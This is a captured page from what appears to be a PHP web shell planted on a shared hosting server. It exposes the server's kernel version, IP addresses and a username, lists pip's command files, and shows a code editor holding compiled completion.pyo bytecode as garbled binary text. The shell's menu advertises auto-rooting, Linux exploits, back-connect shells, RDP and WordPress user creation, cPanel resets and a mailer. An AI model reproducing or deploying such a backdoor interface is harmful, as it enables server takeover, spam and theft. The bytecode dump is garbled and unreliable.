Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.7
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
python2.7 /
site-packages /
pip /
commands /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
2.19
KB
-rw-r--r--
__init__.pyc
2.57
KB
-rw-r--r--
__init__.pyo
2.57
KB
-rw-r--r--
check.py
1.35
KB
-rw-r--r--
check.pyc
1.56
KB
-rw-r--r--
check.pyo
1.56
KB
-rw-r--r--
completion.py
2.4
KB
-rw-r--r--
completion.pyc
2.83
KB
-rw-r--r--
completion.pyo
2.83
KB
-rw-r--r--
download.py
7.63
KB
-rw-r--r--
download.pyc
6.03
KB
-rw-r--r--
download.pyo
6.03
KB
-rw-r--r--
freeze.py
2.77
KB
-rw-r--r--
freeze.pyc
3.12
KB
-rw-r--r--
freeze.pyo
3.12
KB
-rw-r--r--
hash.py
1.56
KB
-rw-r--r--
hash.pyc
2.35
KB
-rw-r--r--
hash.pyo
2.35
KB
-rw-r--r--
help.py
982
B
-rw-r--r--
help.pyc
1.32
KB
-rw-r--r--
help.pyo
1.32
KB
-rw-r--r--
install.py
17.86
KB
-rw-r--r--
install.pyc
11.81
KB
-rw-r--r--
install.pyo
11.81
KB
-rw-r--r--
list.py
11.1
KB
-rw-r--r--
list.pyc
10.88
KB
-rw-r--r--
list.pyo
10.83
KB
-rw-r--r--
search.py
4.4
KB
-rw-r--r--
search.pyc
4.84
KB
-rw-r--r--
search.pyo
4.84
KB
-rw-r--r--
show.py
5.75
KB
-rw-r--r--
show.pyc
5.61
KB
-rw-r--r--
show.pyo
5.61
KB
-rw-r--r--
uninstall.py
2.82
KB
-rw-r--r--
uninstall.pyc
2.97
KB
-rw-r--r--
uninstall.pyo
2.97
KB
-rw-r--r--
wheel.py
7.55
KB
-rw-r--r--
wheel.pyc
6.22
KB
-rw-r--r--
wheel.pyo
6.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : completion.pyo
� ��abc @@ sg d d l m Z d d l Z d d l m Z d Z i d d 6d d 6d d 6Z d e f d � � YZ d S( i ( t absolute_importN( t CommandsJ # pip %(shell)s completion start%(script)s# pip %(shell)s completion end s� _pip_completion() { COMPREPLY=( $( COMP_WORDS="${COMP_WORDS[*]}" \ COMP_CWORD=$COMP_CWORD \ PIP_AUTO_COMPLETE=1 $1 ) ) } complete -o default -F _pip_completion pip t bashs� function _pip_completion { local words cword read -Ac words read -cn cword reply=( $( COMP_WORDS="$words[*]" \ COMP_CWORD=$(( cword-1 )) \ PIP_AUTO_COMPLETE=1 $words[1] ) ) } compctl -K _pip_completion pip t zshs function __fish_complete_pip set -lx COMP_WORDS (commandline -o) "" set -lx COMP_CWORD (math (contains -i -- (commandline -t) $COMP_WORDS)-1) set -lx PIP_AUTO_COMPLETE 1 string split \ -- (eval $COMP_WORDS[1]) end complete -fa "(__fish_complete_pip)" -c pip t fisht CompletionCommandc B@ s, e Z d Z d Z d Z d � Z d � Z RS( s3 A helper command to be used for command completion.t completions- A helper command used for command completion.c O@ s� t t | � j | | � | j } | j d d d d d d d d d d �| j d d d d d d d d d d �| j d d d d d d d d d d �| j j d | � d S( Ns --bashs -bt actiont store_constt constR t destt shellt helps Emit completion code for bashs --zshs -zR s Emit completion code for zshs --fishs -fR s Emit completion code for fishi ( t superR t __init__t cmd_optst add_optiont parsert insert_option_group( t selft argst kwR ( ( s; /usr/lib/python2.7/site-packages/pip/commands/completion.pyR - s* c C@ s� t j � } g t | � D] } d | ^ q } | j | k rp t j | j d � } t i | d 6| j d 6GHn t j j d d j | � � d S( s- Prints the completion code of the given shells --t t scriptR s ERROR: You must pass %s s or N( t COMPLETION_SCRIPTSt keyst sortedR t gett BASE_COMPLETIONt syst stderrt writet join( R t optionsR t shellsR t shell_optionsR ( ( s; /usr/lib/python2.7/site-packages/pip/commands/completion.pyt runG s # ( t __name__t __module__t __doc__t namet summaryR R$ ( ( ( s; /usr/lib/python2.7/site-packages/pip/commands/completion.pyR ( s ( t __future__R R t pip.basecommandR R R R ( ( ( s; /usr/lib/python2.7/site-packages/pip/commands/completion.pyt <module> s
Close